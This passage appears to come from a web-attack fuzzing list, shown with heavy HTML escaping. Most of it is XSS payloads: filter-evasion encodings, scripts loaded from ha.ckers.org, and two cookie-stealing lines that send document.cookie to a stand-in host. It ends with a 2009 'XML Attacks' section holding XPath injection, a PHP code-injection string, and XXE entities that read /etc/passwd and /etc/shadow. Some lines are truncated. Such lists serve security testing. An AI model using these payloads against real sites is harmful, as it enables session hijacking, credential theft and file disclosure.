&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
